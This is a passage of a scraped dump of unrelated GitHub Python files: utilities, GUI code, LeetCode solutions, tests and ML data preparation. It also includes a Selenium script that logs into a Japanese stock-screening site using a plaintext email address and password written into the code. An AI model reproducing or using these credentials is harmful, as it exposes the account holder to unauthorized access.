try:\r\n split = d.split(\"=\")\r\n key = split.pop(0)\r\n val = \"=\".join(split)\r\n config[key] = val\r\n except ValueError:\r\n pass\r\n return config\r\n\r\n def save(self, filename: OpenPath = \"config.txt\", encoding: typing.Optional[str] = constants.ENCODING) -> None:\r\n with open(filename, \"w\", encoding=encoding) as f:\r\n len_config: int = len(self._config) - 1\r\n for idx, key in enumerate(self._config):\r\n f.write(f\"{key}={self._config[key]}\")\r\n if idx < len_config:\r\n 
f.write(\"\\n\")\r\n","repo_name":"danielafriyie/raccy-utils","sub_path":"python/ru/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74936901811","text":"import webbrowser\nfrom tkinter import ttk, Toplevel\n\nfrom dialogs import helper\nfrom report.translation import Translation\n\n\nclass DlgAbout(Toplevel):\n\n def __init__(self, app_version, script_version):\n Toplevel.__init__(self)\n self.title(Translation.get_name('about'))\n self.iconbitmap(\"\")\n\n width = 400\n height = 160\n\n self.geometry(helper.get_center_coords(self, width, height))\n\n self.app_name = \"AssetClassification\"\n self.app_version = f\"App.-Vers.: {app_version}\"\n self.script_version = f\"Script-Vers.: {script_version}\"\n self.app_url = \"https://github.com/gus484/AssetClassification\"\n self.init_page()\n\n def init_page(self):\n ttk.Label(self, text=self.app_name).pack()\n ttk.Label(self, text=self.app_version).pack()\n ttk.Label(self, text=self.script_version).pack()\n ttk.Label(self, text=self.app_url).pack()\n\n link = ttk.Label(self, text=\"Images:\")\n link.pack()\n\n link1 = ttk.Label(self, text=\"Loschen Icons erstellt von Pixel perfect - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link1.pack()\n link1.bind(\"\", lambda e: self.callback(\"https://www.flaticon.com/de/kostenlose-icons/loschen\"))\n\n link2 = ttk.Label(self, text=\"Plus Icons erstellt von Pixel perfect - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link2.pack()\n link2.bind(\"\", lambda e: self.callback(\"ttps://www.flaticon.com/de/kostenlose-icons/plus\"))\n\n link3 = ttk.Label(self, text=\"Datei Icons erstellt von DinosoftLabs - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link3.pack()\n link3.bind(\"\", lambda e: self.callback(\"https://www.flaticon.com/de/kostenlose-icons/datei\"))\n\n link4 = ttk.Label(self, text=\"Graph Icons erstellt von Freepik - Flaticon\", foreground=\"blue\",\n cursor=\"hand2\")\n link4.pack()\n link4.bind(\"\", lambda e: self.callback(\"https://www.flaticon.com/de/kostenlose-icons/graph\"))\n\n def callback(self, url):\n webbrowser.open_new(url)\n\n\nif __name__ == \"__main__\":\n app_about_dlg = DlgAbout()\n app_about_dlg.mainloop()\n","repo_name":"gus484/AssetClassification","sub_path":"dialogs/dlgAbout.py","file_name":"dlgAbout.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18288005837","text":"import urwid, re, time, collections, requests\nfrom customer_types import STICKIES\nfrom frames.abstract_frame import AbstractFrame\nimport time\n\nimport logging\nlog = logging.getLogger(__name__)\n\nclass StoryFrame(AbstractFrame):\n def __init__(self, story, page, urwidViewManager, uFilter=None):\n super().__init__(urwidViewManager, uFilter)\n self.story = story\n self.page = page\n\n storyDict = {\n 'top': 'front_page',\n 'new': 'story',\n 'ask': 'ask_hn',\n 'show': 'show_hn',\n 'jobs' : 'job'\n }\n\n # 'search' will search by relevancy and score\n # this only works well w this api for front page posts\n # using 'search' for say, 'job' will return posts from too long ago\n search = 'search' if self.story == 'top' else 'search_by_date'\n self.url = f'https://hn.algolia.com/api/v1/{search}?tags=' + storyDict[self.story] + f'&page={self.page}'\n\n self.headers = {\n 'user-agent': 'hackernews-TerminusBrowse'\n }\n self.info_text = 
'Score: {} Comments: {}'\n\n        self.load()\n        self.headerString = f'TerminusBrowse: {self.story}'\n\n    # Overrides super\n    def loader(self):\n        self.titles = self.getJSONCatalog(self.url)\n        self.contents = urwid.Pile(self.buildFrame(self.story))\n\n    def buildFrame(self, board):\n        '''returns the board widget'''\n\n        threadButtonList = []\n\n        for title, threadInfo in self.titles.items():\n            if title == 'Next':\n                if not self.uFilter:\n                    subButton = urwid.Button(str(threadInfo[0]), self.changeStoryPage)\n                    threadButtonList.append(urwid.LineBox(urwid.Pile([subButton, urwid.Divider('-'), urwid.Text(threadInfo[1])])))\n                continue\n            if self.uFilter:\n                if re.search(self.uFilter.lower(), title.lower()):\n                    threadButton = urwid.Button(str(threadInfo[0]), self.changeFrameThread)\n                    threadInfo = urwid.Text(self.info_text.format(str(threadInfo[1]),str(threadInfo[2])))\n                    threadList = [threadButton, urwid.Divider('-'), urwid.Divider(), urwid.Text(title), urwid.Divider(), urwid.Divider('-'), threadInfo]\n                    threadButtonList.append(urwid.LineBox(urwid.Pile(threadList)))\n            else:\n                threadButton = urwid.Button(str(threadInfo[0]), self.changeFrameThread)\n                threadInfo = urwid.Text(self.info_text.format(str(threadInfo[1]), str(threadInfo[2])))\n                threadList = [threadButton, urwid.Divider('-'), urwid.Divider(), urwid.Text(title), urwid.Divider(), urwid.Divider('-'), threadInfo]\n                threadButtonList.append(urwid.LineBox(urwid.Pile(threadList)))\n\n        self.parsedItems = len(threadButtonList)\n        catalogueButtons = urwid.GridFlow(threadButtonList, 30, 2, 2, 'center')\n        listbox = urwid.ListBox(urwid.SimpleListWalker([catalogueButtons]))\n\n        self.uvm.itemCount = len(threadButtonList)\n        return [listbox]\n\n    def getJSONCatalog(self, url):\n        response = requests.get(url, headers=self.headers)\n\n        data = response.json()\n\n        return self.parseStoryBoard(data)\n\n    def parseStoryBoard(self, data):\n        titles = collections.OrderedDict()\n\n        for i in range(len(data['hits'])):\n            titles[data['hits'][i]['title']] = (data['hits'][i]['objectID'],\n                                                data['hits'][i]['points'],\n                                                data['hits'][i]['num_comments'])\n\n        if int(self.page) < data['nbPages'] - 1:\n            titles['Next'] = (int(self.page) + 1,\n                              'Next',\n                              '')\n\n        return titles\n\n    def changeFrameThread(self, button):\n        from command_handler_class import CommandHandler\n        ch = CommandHandler(self.uvm)\n        ch.routeCommand('hnp ' + self.story + ' ' + button.get_label())\n\n    def changeStoryPage(self, button):\n        from command_handler_class import CommandHandler\n        ch = CommandHandler(self.uvm)\n        ch.routeCommand('story ' + self.story + ' ' + button.get_label())\n","repo_name":"wtheisen/TerminusBrowser","sub_path":"src/frames/hackernews/story_frame.py","file_name":"story_frame.py","file_ext":"py","file_size_in_byte":4191,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"21"}
+{"seq_id":"70182691572","text":"#\n# @lc app=leetcode.cn id=2441 lang=python3\n#\n# [2441] Largest Positive Integer That Exists With Its Negative\n#\n# https://leetcode.cn/problems/largest-positive-integer-that-exists-with-its-negative/description/\n#\n# algorithms\n# Easy (72.91%)\n# Likes:    31\n# Dislikes: 0\n# Total Accepted:    22.3K\n# Total Submissions: 30.6K\n# Testcase Example:  '[-1,2,-3,3]'\n#\n# You are given an integer array nums that does not contain any zeros. Find the largest positive integer k such that -k also exists in the array.\n# \n# Return the positive integer k. If no such integer exists, return -1.\n# \n# \n# \n# Example 1:\n# \n# \n# Input: nums = [-1,2,-3,3]\n# Output: 3\n# Explanation: 3 is the only k in the array that satisfies the requirement.\n# \n# \n# Example 2:\n# \n# \n# Input: nums = [-1,10,6,7,-7,1]\n# Output: 7\n# Explanation: Both 1 and 7 have their negatives in the array; 7 is the larger value.\n# \n# \n# Example 3:\n# \n# \n# Input: nums = [-10,8,6,7,-2,-3]\n# Output: -1\n# Explanation: No k satisfies the requirement, so return -1.\n# \n# \n# \n# \n# Constraints:\n# \n# \n# 1 <= nums.length <= 1000\n# -1000 <= nums[i] <= 1000\n# nums[i] != 0\n# \n# \n#\n\n# @lc code=start\n\nfrom typing import List\n\nclass Solution:\n    def findMaxK(self, nums: List[int]) -> int:\n        nums.sort()\n        i = 0\n        j = len(nums) - 1\n        while i < len(nums) and nums[i] < 0:\n            cur = nums[i]\n            while j > i and nums[j] > -cur:\n                j -= 1\n            if j == i:\n                return -1\n            \n            if nums[j] < -cur:\n                i += 1\n                continue\n            \n            return -cur\n        \n        return -1\n\n\n# @lc code=end\n\n","repo_name":"xiaohejun/fantastic-acm","sub_path":"leetcode/2441.与对应负数同时存在的最大正整数.py","file_name":"2441.与对应负数同时存在的最大正整数.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"}
+{"seq_id":"18739417427","text":"from pyspark.sql import SparkSession, Row\nfrom pyspark.sql import functions as func\n\nspark = SparkSession.builder.appName(\"test\").getOrCreate()\n\npeople = spark.read.option(\"header\", \"true\").option('inferSchema',\"true\").csv(\"file:///sparkcourse/fakefriends-header.csv\")\n\npeople.printSchema()\n\npeoplefil = people.select(\"age\",\"friends\")\n\npeople.groupby(\"age\").avg().select(\"age\",\"avg(friends)\").sort(\"age\").show()\n\npeople.groupby(\"age\").agg(func.round(func.avg(\"friends\"),2).alias(\"friends_avg\")).sort(\"age\").show()\n\nspark.stop()\n","repo_name":"Prmnk/pyspark_v1","sub_path":"spsqltest.py","file_name":"spsqltest.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25110297757","text":"# -*- coding : utf-8 -*-\nimport math\n\nimport pytest\n\nfrom geometry import Vector\n\n\ndef test_vector_generation():\n    Vector([1, 2, 3])\n    Vector(i for i in range(10))\n\n    with pytest.raises(ValueError):\n        Vector([\"1\", \"2\", \"3\"])\n\n\ndef test_vector_neg():\n    v1 = Vector([1, 2, 3])\n    assert -v1 == Vector([-1, -2, -3])\n\n\ndef test_vector_add():\n    v1 = Vector([1, 2, 3])\n    v2 = Vector([1, 2, 3])\n\n    v3 = v1 + v2\n    assert v3 == Vector([2, 4, 6])\n\n\ndef test_vector_sub():\n    v1 = Vector([1, 2, 3])\n    v2 = Vector([1, 2, 3])\n\n    v3 = v1 - v2\n    assert v3 == Vector([0, 0, 0])\n\n\ndef test_vector_mul():\n    v1 = Vector([1, 2, 3])\n    v2 = Vector([1, 2, 3])\n\n    v3 = v1 * v2\n    assert v3 == Vector([1, 4, 9])\n\n\ndef test_vector_div():\n    v1 = Vector([1, 2, 3])\n    v2 = Vector([1, 2, 3])\n\n    v3 = v1 / v2\n    assert v3 == Vector([1, 1, 1])\n\n\ndef test_vector_pow():\n    v1 = Vector([2, 2, 2, 2])\n    exp = 2\n    v2 = Vector([1, 2, 3, 4])\n    assert v1 ** exp == Vector([4, 4, 4, 4])\n    assert v1 ** v2 == Vector([2, 4, 8, 16])\n\n\ndef test_vector_append():\n    v1 = Vector([1, 2, 3])\n    v1.append(4)\n    assert v1 == Vector([1, 2, 3, 4])\n\n\ndef test_vector_extend():\n    v1 = Vector([1, 2])\n    v1.extend([3, 4, 5])\n    assert v1 == Vector([1, 2, 3, 4, 5])\n\n\ndef test_vector_magnitude():\n    v1 = Vector([3, 4, 12])\n    assert v1.magnitude() == 13\n\n\ndef test_vector_scaling():\n    v1 = Vector([1, 1, 1])\n    assert 
v1.scale(2) == Vector([2, 2, 2])\n\n\ndef test_vector_normalize():\n v1 = Vector([4, 5, 6])\n normed = v1.normalize()\n assert normed.is_unit_vector()\n\n\ndef test_vector_dot():\n v1 = Vector([1, 2, 3])\n v2 = Vector([1, 2, 3])\n assert v1.dot(v2) == 14\n\n\ndef test_vector_cross():\n v1 = Vector([2, 3])\n v2 = Vector([1, 7])\n assert v1.cross(v2) == Vector([11])\n\n v3 = Vector([2, 7, 4])\n v4 = Vector([3, 9, 8])\n assert v3.cross(v4) == Vector([20, -4, -3])\n\n assert v1.cross(v3) == Vector([12, -8, 8])\n assert v4.cross(v2) == Vector([-56, 8, 12])\n\n\ndef test_vector_angle():\n v1 = Vector([1, 0, 0])\n v2 = Vector([0, 1, 0])\n assert math.isclose(v1.angle(v2), math.pi / 2, rel_tol=1e-04)\n\n\ndef test_vector_parallel():\n v1 = Vector([1, 1, 1])\n v2 = Vector([3, 3, 3])\n v3 = Vector([0, 1, 0])\n\n assert v1.is_parallel(v2)\n assert not v2.is_parallel(v3)\n assert not v3.is_parallel(v1)\n\n\ndef test_vector_antiparallel():\n v1 = Vector([1, 1, 1])\n v2 = Vector([-1, -1, -1])\n v3 = Vector([0, 0, 1])\n\n assert v1.is_antiparallel(v2)\n assert not v2.is_antiparallel(v3)\n assert not v3.is_antiparallel(v1)\n\n\ndef test_vector_orthogonal():\n v1 = Vector([1, 0, 0])\n v2 = Vector([0, 1, 0])\n v3 = Vector([0, 0, 1])\n v4 = Vector([1, 1, 1])\n\n assert v1.is_orthogonal(v2)\n assert v2.is_orthogonal(v3)\n assert v3.is_orthogonal(v1)\n assert not v1.is_orthogonal(v4)\n","repo_name":"fR0zTy/geometry","sub_path":"geometry/object/test/test_vector.py","file_name":"test_vector.py","file_ext":"py","file_size_in_byte":2863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5323666329","text":"\ndef s2_check_till_sqrt(upper_bound):\n\n check_times = 0\n prime_number_list = []\n\n for prime_candidate in range(2, upper_bound + 1):\n\n sqrt_of_prime_candidate = int(prime_candidate ** 0.5) + 1\n\n for potential_factor in range(2, sqrt_of_prime_candidate + 1): # if prime candidate is 41, check from 2 to 7\n check_times += 1\n if prime_candidate % potential_factor == 0:\n break\n else:\n prime_number_list.append(prime_candidate)\n\n '''\n if break clause is not triggered, else cause will be triggered.\n '''\n\n print(f\"In total, it takes {check_times} times. \")\n return prime_number_list\n\n\n'''\nHOMEWORK:\nExplain clearly, why if we check till square root, then it is good enough already? 
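\n\nHint (a sketch of the standard argument): if n = a * b with 2 <= a <= b, then\na * a <= a * b = n, so a <= sqrt(n). Every composite n therefore has a factor no\nlarger than sqrt(n), and scanning candidates up to sqrt(n) cannot miss it; e.g.\n91 = 7 * 13 is caught at 7, and 7 <= sqrt(91) ~ 9.54.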
\n'''\n\n\nl1 = s2_check_till_sqrt(10000)\nprint(l1)\n","repo_name":"Coding-PIGGY/PythonClass03","sub_path":"program3/python_0148_practice_find_prime_numbers_s2.py","file_name":"python_0148_practice_find_prime_numbers_s2.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6118526361","text":"import functools\nimport logging\nimport os\nimport re\nimport sys\nfrom inspect import getdoc\n\nfrom docopt import docopt\nfrom docopt import DocoptExit\n\n\nlog = logging.getLogger(__name__)\n\n\ndef dispatch(command_classes, before_f=None, args=None, env=None):\n if not args:\n args = sys.argv[1:]\n try:\n handler, options = parse(command_classes, docopt_opts={'options_first': True},\n args=args, env=None)\n except NoSuchCommand as e:\n commands = '\\n'.join(parse_section('commands:', getdoc(e.container)))\n log.error(f'No such command: {e.command}\\n{commands}')\n sys.exit(1)\n\n if before_f:\n before_f(handler, options)\n handler(options)\n\n\ndef parse(command_classes, command='__root__', command_opts=None, docopt_opts={},\n args=None, env=None):\n command_class = command_classes.get(command)\n if not command_class:\n raise Exception()\n command_help = getdoc(command_class)\n if not command_opts:\n command_opts = {}\n command_opts.update(_docopt(command_help, args, **docopt_opts))\n command = command_opts['COMMAND']\n command = command.replace('-', '_')\n\n if command in command_classes:\n return parse(command_classes, command=command, command_opts=command_opts,\n docopt_opts=docopt_opts, args=[command] + command_opts['ARGS'])\n\n if not command or command in ('-h', '--help'):\n raise SystemExit(command_help)\n\n command_handler = get_handler(command_class, command)\n command_help = getdoc(command_handler)\n if command_help is None:\n raise NoSuchCommand(command, command_class)\n\n command_opts.update(_docopt(command_help, command_opts['ARGS'], options_first=True))\n if env:\n prefix = f'{env}_'\n env_option_keys = ((k, prefix + k.lstrip('-').replace('-', '_').upper())\n for k in command_opts.keys())\n env_options = {opt_key: os.environ[env_key]\n for opt_key, env_key in env_option_keys\n if env_key in os.environ}\n command_opts = {**env_options, **command_opts}\n\n return command_handler, command_opts\n\n\ndef _docopt(docstring, *args, **kwargs):\n try:\n return docopt(docstring, *args, **kwargs)\n except DocoptExit:\n raise SystemExit(docstring)\n\n\ndef get_handler(command_class, command):\n command_name = command.replace('-', '_')\n if not hasattr(command_class, command_name):\n raise NoSuchCommand(command, command_class)\n instance = command_class()\n return getattr(instance, command)\n\n\n# From docopt@master\ndef parse_section(name, source):\n pattern = re.compile('^([^\\n]*' + name + '[^\\n]*\\n?(?:[ \\t].*?(?:\\n|$))*)',\n re.IGNORECASE | re.MULTILINE)\n return [s.strip() for s in pattern.findall(source)]\n\n\nclass NoSuchCommand(Exception):\n def __init__(self, command, container):\n super().__init__(f'No such command: {command}')\n self.command = command\n self.container = container\n","repo_name":"ucalgary/docopt-utils","sub_path":"docopt_utils/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14830508305","text":"from turtle import *\nbok=7\nspeed('fastest')\n\ndef kwadrat(bok,kolor):\n fillcolor(kolor)\n begin_fill()\n for i in 
range(4):\n fd(bok)\n rt(90)\n end_fill()\n \ncolormode(255)\ntracer(0,1)\npu()\ngoto(-100,100)\npd()\n\nfor wiersze in open('obrazek tekstowy.txt').readlines():\n L=wiersze.split()\n for i in range(len(L)):\n kolor=eval(L[i])\n kwadrat(bok,kolor)\n pu()\n rt(90)\n fd(bok)\n lt(90)\n pd()\n pu()\n fd(bok)\n lt(90)\n fd(len(L)*bok)\n rt(90)\n pd()\n \n\n","repo_name":"miloczek/Projekty-II-UWR","sub_path":"my python/Zadanie python/lista 7/krowa.py","file_name":"krowa.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1180073724","text":"\n#you need to add the encoding parameter at all times\n#it will spit out nonsense if you don't\nwith open('secretMessage.txt','r',encoding='utf-8') as sm:\n mesg_content = sm.read()\n\nwith open('pad.txt','r',encoding='utf-8') as pad:\n pad_content = pad.read()\n\n\"\"\"\nHOW THIS WORKS \n similar to encrypting, but instead of the message we feed it the cipher text\n and the pad that used was for encrypting\n\"\"\"\ndef decrypt(message,pad):\n plaintext = \"\"\n for i,j in zip(message,pad):\n xored_value = ord(i) ^ ord(j)\n plaintextvalue = chr(xored_value)\n plaintext +=(plaintextvalue)\n return plaintext\n\nmessage = decrypt(mesg_content,pad_content)\nwith open('TheMessage','w+',encoding='utf-8') as TheMessage:\n TheMessage.write(message)","repo_name":"GreenArthur/OneTimePad","sub_path":"DecryptionOTP.py","file_name":"DecryptionOTP.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28076676249","text":"import random\nfrom os import mkdir\nfrom os.path import basename, exists, join\n\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torch.nn import functional as F\nfrom tqdm import tqdm as tqdm\nimport torchvision.transforms as transforms\n\nfrom dcgan_models import Encoder, Generator\nfrom utils import get_jpg_images, load_encoder, load_generator, denorm\n\n\ndef generate_pix2pix_dataset(generator_params, encoder_params, input_dataset_path='shoes_images', dcgan_image_size=64, pix2pix_image_size=128, output_path='pix2pix/datasets/details_dataset'):\n phases = ['train','test']\n\n out_A_path = join(output_path,'A')\n out_B_path = join(output_path,'B')\n out_AB_path = join(output_path,'AB')\n\n for path in (out_A_path, out_B_path, out_AB_path):\n if not exists(path):\n mkdir(path)\n for phase in phases:\n if not exists(join(path,phase)):\n mkdir(join(path,phase))\n\n # useful transforms\n transform = transforms.Compose([transforms.Resize((dcgan_image_size,dcgan_image_size), Image.LANCZOS),\n transforms.ToTensor(),\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\n\n interpolate = lambda x: F.interpolate(x, scale_factor=pix2pix_image_size/dcgan_image_size, mode='bilinear')\n\n # Load DCGAN models:\n G = load_generator(**generator_params)\n E = load_encoder(**encoder_params)\n\n # Iterate on images\n images_list = get_jpg_images(input_dataset_path)\n random.Random(5).shuffle(images_list) # shuffle dataset with a constant seed (5) for consistency\n phase_cutoffs = [0.95*len(images_list), len(images_list)]\n cur_phase = 0\n for i, image_file in tqdm(enumerate(images_list)):\n if i > phase_cutoffs[cur_phase]:\n cur_phase += 1\n with Image.open(image_file) as image:\n in_image = transform(image.convert(\"RGB\")).cuda()\n if tuple(in_image.shape[-3:]) != (3,dcgan_image_size,dcgan_image_size):\n print(f\"WARNING! 
Unexpected input size: {in_image.shape} in file {image_file}. Skipping...\")\n continue\n B_image = image.resize((pix2pix_image_size,pix2pix_image_size), Image.BILINEAR)\n B_image.save(join(out_B_path,phases[cur_phase],basename(image_file)[:-3]+\"png\"))\n generated_image = G(E(in_image.reshape(1,3,dcgan_image_size,dcgan_image_size)))\n upsampled = interpolate(generated_image)\n fixed_point = np.uint8(np.round(255*denorm(upsampled).cpu().numpy()))[0,...]\n fixed_point = np.transpose(fixed_point, (1,2,0))\n A_image = Image.fromarray(fixed_point)\n A_image.save(out_A_path+'/'+phases[cur_phase]+'/'+basename(image_file)[:-3]+\"png\")\n \n w, h = A_image.size\n AB_image = Image.new(\"RGB\", (2*w, h))\n AB_image.paste(A_image, (0,0))\n AB_image.paste(B_image, (w,0))\n AB_image.save(join(out_AB_path,phases[cur_phase],basename(image_file)[:-3]+\"png\"))\n","repo_name":"drorsimon/image_barycenters","sub_path":"generate_pix_dataset.py","file_name":"generate_pix_dataset.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"70290060213","text":"\nimport codecs\n\nimport time\nfrom tkinter import messagebox\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom PIL import ImageGrab\nimport requests\nimport openpyxl\nfrom openpyxl.utils import get_column_letter\n\n\n\n\"\"\"\nisStatusCodeNomal\n@param URL 取得するURL\n\"\"\" \ndef isStatusCodeNomal(URL):\n res = requests.get(URL)\n isStatus = res.status_code\n print(res.status_code)\n return isStatus\n \n\"\"\"\ndriverOpen\n@param URL 取得するURL\n\"\"\" \n\n\n \n\"\"\"\ngetCurrentTextPage\n@param className HTMLページのクラスを指定\n@return tagList\n\"\"\" \ndef getCurrentTextPage(className):\n #カレントページを取得する\n html =driver.page_source.encode('utf-8')\n #読み込む情報を解析する。\n soup = BeautifulSoup(html, 'html.parser')\n #指定のクラスを リストで取得する。\n tagList = soup.select(className)\n \n mylist = []\n with codecs.open('file.txt', 'w' , 'utf-8') as f:\n for item in tagList:\n if item.find('div') is not None:\n print(item.find('div').text, file=f)\n \n'''\nテキスト挿入\n'''\ndef sendKey(xpath , string ):\n elem = driver.find_element(By.XPATH,xpath).send_keys(string)\n time.sleep(1)\n \n'''\n画面クリック\n'''\ndef clicKey(xpath):\n elem = driver.find_element(By.XPATH,xpath)\n driver.execute_script(\"arguments[0].click();\" , elem) \n time.sleep(1)\n\ndef init(path,profile): \n options = webdriver.ChromeOptions()\n options.add_argument('--user-data-dir=' +str(path))\n options.add_argument('--profile-directory=' +str(profile)) # この行を省略するとDefaultフォルダが指定されます\n driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()) , options = options )\n return driver\n \n\"\"\"\nmainMethod\n@param void\n\"\"\"\nif __name__ == '__main__':\n options = webdriver.ChromeOptions()\n \n with webdriver.Chrome(ChromeDriverManager().install() , options= options) as driver:\n print(\"処理を開始します。\")\n time.sleep(2)\n \n \n URL =\"https://id.toyokeizai.net/sol/?return_to=%2Fscreening\"\n driver.set_window_size(1280, 720)\n driver.maximize_window()\n driver.get(URL)\n time.sleep(1)\n\n #mailAddressを挿入\n sendKey('//*[@id=\"tkz_id\"]' , 'tosinobu117@hotmail.com' )\n #Passwordを挿入\n sendKey('//*[@id=\"password\"]' , 'Reij5371' )\n #loginボタンクリック\n driver.save_screenshot('screenshot_login.png')\n time.sleep(1)\n 
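# clicKey() (defined above) clicks through execute_script rather than the native\n        # elem.click(); the JS click is a common workaround when an overlay intercepts\n        # the click (ElementClickInterceptedException). The same pattern, as a sketch:\n        #   elem = driver.find_element(By.XPATH, xpath)\n        #   driver.execute_script(\"arguments[0].click();\", elem)\n        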
clicKey('//*[@id=\"mailLogin\"]/div/p[1]/input')\n\n #保存した検索結果のダイアログクリック\n clicKey('//*[@id=\"pageTop\"]/div[1]/div/div[2]/div/ul/li[3]/div[1]')\n driver.save_screenshot('screenshot_daialog.png')\n time.sleep(1)\n \n #対象の検索条件をクリック\n time.sleep(1)\n clicKey('//*[@id=\"pageTop\"]/div[1]/div/div[2]/div/ul/li[3]/div[2]/ul/div[2]/div/li[26]')\n driver.save_screenshot('screenshot_reserchWord.png')\n time.sleep(1)\n \n #検索をクリック\n clicKey('//*[@id=\"pageTop\"]/div[1]/div/div[2]/div/div/div/div/button')\n time.sleep(3)\n\n \n window_after = driver.window_handles[1]\n #seleniumの操作対象を当初から開いているウインドウに切り替える\n driver.switch_to.window(window_after)\n driver.save_screenshot('screenshot_result.png')\n #カレントページの取得\n\n #指定のURLのクラスからデータを取得する\n #className = \"[class*='vgt-left-align -MIC001']\"\n className = \"[class*='vgt-left-align -no']\"\n taglist = getCurrentTextPage(className)\n\n \n print('処理を終了します')","repo_name":"tktktakatsuka/pythonTools","sub_path":"sikihou/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3938,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29629632254","text":"import tensorflow as tf\n\nfrom src.model.metric import compute_bleu\n\n\ndef get_sentence(x, start=\"\", end=\"\", pad=\"\"):\n \"\"\"\n\n Args:\n x: list of words tokenized by preprocessor\n\n Returns:\n string without control tokens\n\n \"\"\"\n ctl_tokens = [start, end, pad]\n ret = []\n for each in x:\n if each not in ctl_tokens:\n ret.append(each)\n elif each == end:\n break\n\n return \" \".join(ret)\n\n\ndef get_bleu_score(x, y):\n \"\"\"\n\n Args:\n x: list of original sentences\n y: list of inferenced sentences\n\n Returns:\n mean value of bleu scores\n \"\"\"\n scores = []\n for _x, _y in zip(x, y):\n if isinstance(_x, str):\n _x, _y = _x.split(), _y.split()\n reference_corpus = [[get_sentence(_x)]]\n translation_corpus = [get_sentence(_y)]\n bleu_elements = compute_bleu(\n reference_corpus, translation_corpus, max_order=4, smooth=False\n )\n bleu_score = bleu_elements[0]\n scores.append(bleu_score)\n return sum(scores) / len(scores)\n\n\ndef create_look_ahead_mask(seq_len):\n mask = []\n for i in range(seq_len):\n mask.append([0] * (i + 1) + [1] * (seq_len - i - 1))\n mask = tf.constant(mask, dtype=tf.float32, shape=(seq_len, seq_len))\n mask = mask[tf.newaxis, tf.newaxis, :, :]\n assert mask.shape == (1, 1, seq_len, seq_len)\n return mask\n\n\ndef create_pad_mask(x, pad_idx=0):\n \"\"\"PAD -> Mask\"\"\"\n batch_size = x.shape[0]\n seq_len = x.shape[1]\n mask = tf.cast(tf.math.equal(x, pad_idx), dtype=tf.float32)\n mask = mask[:, tf.newaxis, tf.newaxis, :]\n assert mask.shape == (batch_size, 1, 1, seq_len)\n return mask\n","repo_name":"minhyeoky/machine-translation","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"73001665973","text":"# coding:utf-8\n# @Time : 2022/6/28 16:35 \n# @Author : clf\n# @File : demo7.py.py \n# @Software: PyCharm\ndict_ticket={'G1569':['北京南=天津南','18:05','18:39','00:34'],\n 'G1567':['北京南=天津南','18:15','18:49','00:34'],\n 'G8917':['北京南=天津南','18:20','19:19','00:59'],\n 'G203':['北京南=天津南','18:35','19:09','00:34'],\n }\nprint('车次\\t\\t出发站-到达站\\t出发时间\\t到达时间\\t历时时长')\nfor item in dict_ticket:\n print(item,end=' ')\n for i in dict_ticket[item]:\n print(i,end=' ')\n 
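# the bare print() that follows ends the row, so each train prints on one line\n    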
print()\n\ntrain_no=input('请输入要购买的车次:')\npersons=input('请输入乘车人,如果是多人请使用逗号分隔')\ns=f'您已购买了{train_no}次列车'\ns_info=dict_ticket[train_no] #获取车次详细信息\ns += s_info[0]+' '+s_info[1]+'开,'\nprint(f'{s}请{persons}尽快取走纸质车票。【铁路客服】')","repo_name":"ChenLiufeng/PythonPrograming","sub_path":"chap13/实操案例三/demo7.py","file_name":"demo7.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73888382132","text":"class Solution:\n def findNumberOfLIS(self, nums: List[int]) -> int:\n cnt = [0]*len(nums) # store the count of the LIS ends with nums[i]\n length = [0]*len(nums) # store the longest increasing subseq ends with nums[i]\n maxL = float('-inf')\n res = 0\n for i in range(len(nums)):\n length[i] = cnt[i] = 1\n for j in range(i):\n if nums[i] > nums[j]:\n if length[i] == length[j]+1:\n cnt[i] += cnt[j]\n elif length[i] < length[j]+1:\n length[i] = length[j]+1\n cnt[i] = cnt[j]\n if maxL < length[i]:\n maxL = length[i]\n res = cnt[i]\n elif maxL == length[i]:\n res += cnt[i]\n return res\n \nif __name__ == '__main__':\n s = Solution()\n print(s.findNumberOfLIS([2,2,2,2,2])) # 